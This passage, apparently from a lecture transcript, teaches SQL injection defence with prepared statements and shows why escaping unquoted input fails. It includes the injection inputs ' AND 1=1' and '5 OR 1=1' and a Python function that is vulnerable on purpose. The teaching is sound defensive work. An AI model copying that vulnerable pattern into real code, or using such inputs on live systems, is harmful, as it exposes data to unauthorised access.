uses those.
Prepared statements. The idea of prepared statements is that your application tells the database, hey, I'm about to make a query, and here are the placeholders where I'm gonna put data. And then the SQL server pre-processes and parses that query and says, okay, great, let me know when you have the data. And then you say, hey, here's the data. The first parameter is this, the second parameter is this. And so the idea is that the statements are compiled and parsed before the user input is added. So you're separating this process. And so really, prepared statements are basically the way to go. This is the only way to absolutely ensure that you have no SQL injection vulnerabilities. Because you're providing the structure of the query first and then you're providing the arguments, those arguments cannot change the structure of the query, right? The SQL server has already parsed it, it already knows exactly what it should be. So an example of this in PHP. So here I'm selecting all from users where username = :name, so this is just a placeholder, and password = SHA1(CONCAT(:pass, salt)) LIMIT 1. So now I'm preparing this statement. So the :name and the :pass, right, these are just placeholders that tell the SQL engine, hey, I'm gonna give you the values of name and pass, and here's where I want you to use them. But parse this thing now, right? Get the structure of this query now, and then bind name to :name, bind pass to :pass, and then execute the query, right? Now there's no possible way that name and password can ever alter the structure of this query. So what's the difference between this and the other way? The name and the password need separate statements here? Yes. From a programmer's perspective, which is easier? Yeah, the other way, right? And you can see that's why that's what developers go to, right? I mean, you can do it in one line, right?
You can do mysql_query with a string with embedded $name and $pass, right? And it's exactly what you mean. That's what you wanted. You want the query with the data represented in it. But here, instead of one statement, you have four statements, right? You have to prepare it, you have to bind, and then you have to execute, right? But this is the way you have to do it if you want to be 100% sure. The other way to do it is to make sure that absolutely anything that touches a SQL query has been sanitized, right? But that's actually a much harder task than using prepared statements, right? Prepared statements are fundamentally correct. Sanitizing is kind of just a workaround, a band-aid. You're like, well, I don't really want to use the proper way to do it, right? Because think about it. Let's say that we do use mysql_real_escape_string, right? But we're using it on input that is not surrounded by single quotes, like in that ID example, the press release example, right? Here, even if... where is it? There you go. SELECT title, description FROM press_releases WHERE id equals, right? We have no ticks around the value here. So even if we real-escape this, we can add a space, and we can add AND, and then we can add a space and 1=1, right? We just can't add single quotes or some other characters. We can still have a SQL injection vulnerability here, even though it looks like it is correct and that you properly sanitized everything. That's because the developer did not use single quotes to enclose the input. This problem does not exist with prepared statements. That's why prepared statements are the better way to go. All right, so let's stop here, and we will talk about cross-site scripting vulnerabilities on whatever that next day is.
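As a footnote to that last point, here is a small sketch that puts the two approaches side by side for the unquoted press release ID. It assumes Python with an in-memory SQLite database rather than PHP and MySQL. The escape helper is a hypothetical stand-in for mysql_real_escape_string, and lookup_escaped, lookup_prepared, and the sample rows are made up for illustration. The :id placeholder mirrors the :name and :pass placeholders from the PHP example.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE press_releases (id INTEGER PRIMARY KEY, title TEXT);
    INSERT INTO press_releases VALUES (5, 'Public release'), (6, 'Embargoed draft');
""")


def escape(value: str) -> str:
    """Hypothetical stand-in for an escaping function: only ticks are touched."""
    return value.replace("'", "''")


def lookup_escaped(id_param: str) -> list:
    """Escaped but unquoted: spaces, AND, OR and digits pass straight through."""
    query = "SELECT title FROM press_releases WHERE id = " + escape(id_param)
    return [row[0] for row in conn.execute(query)]


def lookup_prepared(id_param: str) -> list:
    """Structure first, data second: the value can only ever be a value."""
    query = "SELECT title FROM press_releases WHERE id = :id"
    return [row[0] for row in conn.execute(query, {"id": id_param})]
```

With an honest input of "5" both functions return the public release. With "5 OR 1=1" the escaped version returns every row, because there was never a tick to escape, while the prepared version compares the ID against the whole string and finds nothing.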